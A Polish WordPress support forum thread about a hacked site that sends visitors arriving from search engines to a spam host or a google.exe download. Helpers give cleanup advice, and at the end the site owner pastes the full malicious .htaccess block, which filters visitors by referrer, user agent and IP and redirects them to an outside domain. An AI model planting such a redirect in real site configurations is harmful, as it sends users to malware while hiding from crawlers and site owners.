• Rozwiązano iver210

    (@iver210)


    Witam
    Mam problem z WP na stronie na której pracuje. Mianowicie:
    -strona tydzień temu była na wp 3.0.5
    -Dostałem info że po wyszukaniu strony przez google użytkownicy są przekierowywani na stronę findmeaprostitute.com
    -po wpisaniu bezpośredniego adresu jest ok
    -zaktualizowałem wp do najnowszej wersji
    -obecnie jest tak że google po wpisaniu strony w wyszukiwarkę przekierowuje z powrotem na google.pl lub ściąga plik google.zip–> google.exe

    Co zrobić żeby wszystko wróciło do normy. Dodam że .htaccess jest czysty tzn standardowe wpisy. Bardzo proszę o pomoc.
    Jeśli temat jest w złym dziale proszę o przeniesienie.

Zobacz 9 odpowiedzi - od 1 do 9 (z 9 łącznie)
  • Co zrobić żeby wszystko wróciło do normy.

    1. odwirusowac sobie komputer
    2. zmienić hasło do FTP konta
    3. zainstalować ponownie wordpressa
    4. wywalić wtyczki spoza repozytorium wordpress.org
    5. sprawdzić/wywalić motyw jeżeli spoza repozytorium wordpress.org
    6. nie używać zapisywania hasła w klientach FTP

    przed krokiem #3 radził bym poszukać plików z „niespodzianką” sprawdzając ich daty modyfikacji, potem sprawdzić w logach serwera jak doszło do infekcji – przyda się przy łataniu.

    Twórca wątku iver210

    (@iver210)

    przed krokiem #3 radził bym poszukać plików z „niespodzianką” sprawdzając ich daty modyfikacji, potem sprawdzić w logach serwera jak doszło do infekcji – przyda się przy łataniu.

    No właśnie, nie zrobiłem tego. Miała być szybka akcja. Co teraz jeśli nie mogę sprawdzić zmodyfikowania plików ?. W logach serwera widziałem bardzo duży ruch we środę.

    odwirusowac sobie komputer
    zmienić hasło do FTP konta
    zainstalować ponownie wordpressa
    wywalić wtyczki spoza repozytorium wordpress.org
    sprawdzić/wywalić motyw jeżeli spoza repozytorium wordpress.org
    nie używać zapisywania hasła w klientach FTP

    1. komputer nie ma wirusa chroni go Eset IS 5
    2. hasła do ftp nie były zapisane na komputerze
    3. ostateczność (chyba)
    4. Lista włączonych wtyczek przed:
    Contact Form 7
    Custom Theme Fields
    qTranslate
    WordPress Importer
    5. Motyw to podstawowy motyw z dostosowaną grafiką
    6. punkt 2.

    1. komputer nie ma wirusa chroni go Eset IS 5

    Cieszy mnie Twoja pewność, dzięki temu można od razu zmieniać hasła FTP.

    hasła do ftp nie były zapisane na komputerze

    Użyte, przesłane mailem, cokolwiek. Śmieci do strony nie przyczepiają się inaczej niż przez FTP lub wgranie samodzielne badziewnego kodu. Jest jeszcze opcja wyżej, że hosting został złamany lub jest kiepski, ale takie coś to raczej ostateczność.

    3. ostateczność (chyba)

    Przez przeinstalowanie rozumiem podmianę plików silnika na świeże, bez zmiany bazy. Nie spotkałem się do tej pory z doklejaniem śmieci do danych w bazie. Zazwyczaj infekowane są np. wszystkie plik .php czy .html.

    reszta wygląda ok.

    naprawdę wgrałbym jeszcze raz WP, wtyczki i szablon.

    Twórca wątku iver210

    (@iver210)

    Cieszy mnie Twoja pewność, dzięki temu można od razu zmieniać hasła FTP.

    Komputer przeskanowany Esetem + Combofix
    Jest czysto. Hasła zmienione.

    Użyte, przesłane mailem, cokolwiek. Śmieci do strony nie przyczepiają się inaczej niż przez FTP lub wgranie samodzielne badziewnego kodu. Jest jeszcze opcja wyżej, że hosting został złamany lub jest kiepski, ale takie coś to raczej ostateczność.

    Hosting Home.pl

    Przez przeinstalowanie rozumiem podmianę plików silnika na świeże, bez zmiany bazy. Nie spotkałem się do tej pory z doklejaniem śmieci do danych w bazie. Zazwyczaj infekowane są np. wszystkie plik .php czy .html.

    Czy aktualizacja nie podmienia dużej ilość najważniejszych plików ?

    Aktualnie poczytałem trochę o Googlebot oraz Narzędzia dla webmasterów i popiołem stronę pod google.

    Czy aktualizacja nie podmienia dużej ilość najważniejszych plików ?

    Nie, od jakiegoś czasu aktualizacja obejmuje tylko pliki zmienione.

    No właśnie, nie zrobiłem tego. Miała być szybka akcja. Co teraz jeśli nie mogę sprawdzić zmodyfikowania plików ?. W logach serwera widziałem bardzo duży ruch we środę.

    A to dlaczego? -co zrobiłeś?

    W logach mimo wszystko można pogrzebać …tylko będzie trudniej znaleźć.
    Z kolei jeżeli odpada weryfikacja plików po czasach …a nie masz doświadczenia w odpluskwianiu, to do usunięcia są wp-admin, wp-includes, szablony i pluginy.
    Uploadujesz świeże kopie wp-admin i wp-includes z paczki wordpressa, nadpisujesz też wszystkie pliki w katalogu głównym bloga plikami z paczki.
    Wgrywasz świeży szablon i rozszerzenia.
    Potem …sprawdzasz wszystkie nie nadpisane pliki jak plik wp-config.php, pliki .htaccess itp., sprawdzasz też zawartość folderu uploadu i inne nietknięte przy przywracaniu lokalizacje.
    -Złośliwy kod nie tylko jest dopisywany do istniejących plików, ale też często ukrywany jest w nowoutworzonych plikach o niepozornych nazwach, jako pliki graficzne, cache etc. Najczęściej jest tez instalowany shellcode dający pełna kontrolę nad serwerem.

    Warto też sprawdzić bazę – chociaż w poszukiwaniu ciągów typu: eval, base64, gzinflate … – może nie nagminnie, ale jednak bazy bywaja wykorzystywane do ukrywania kodu.

    Twórca wątku iver210

    (@iver210)

    A to dlaczego? -co zrobiłeś?

    Odrazu aktualizacja bez sprawdzenia daty modyfikacji.

    Wnioskuje po waszych wpisach że bez ponownej instalacji WP i przejrzeniu bazy nie ruszę tematu.

    Twórca wątku iver210

    (@iver210)

    Witam
    Problem rozwiązany.

    Wszystko tkwiło w .htacess. Złośliwy kod był w 1007 lini pliku.
    Podaje kod dla przestrogi.

    <IfModule prefork.c>
    RewriteEngine On
    RewriteCond %{REQUEST_METHOD} ^GET$
    RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.|hi5\.|friendster\.|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
    RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
    RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
    RewriteCond %{REMOTE_ADDR} !^66\.249.*$ [NC]
    RewriteCond %{REMOTE_ADDR} !^74\.125.*$ [NC]
    RewriteCond %{HTTP_COOKIE} !^.*RkO.*$ [NC]
    RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
    RewriteCond %{HTTPS} ^off$
    RewriteRule ^(.*)$ http://rotherforth.mobilephoneguy.com/url?sa=t&source=web&cd=22&ved=07D3dp6Hx&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZIqeqvN4a62ro2MzFw59py1pw==&usg=sQ-FALuNOPlqbEJ2kPHWAu&sig2=ufHYf3MGJY5RWTmqI-FE5q [R=302,L,CO=RkO:77:%{HTTP_HOST}:11639:/:0:HttpOnly]
    </IfModule>
    #8535c86c5a780397b185db04470654a552b88650ea758502467f61eb

    Dziękuje za Pomoc.
    Pozdrawiam

Zobacz 9 odpowiedzi - od 1 do 9 (z 9 łącznie)

Temat ‘Atak wordpress przekierowanie google.’ jest zamknięty na nowe odpowiedzi.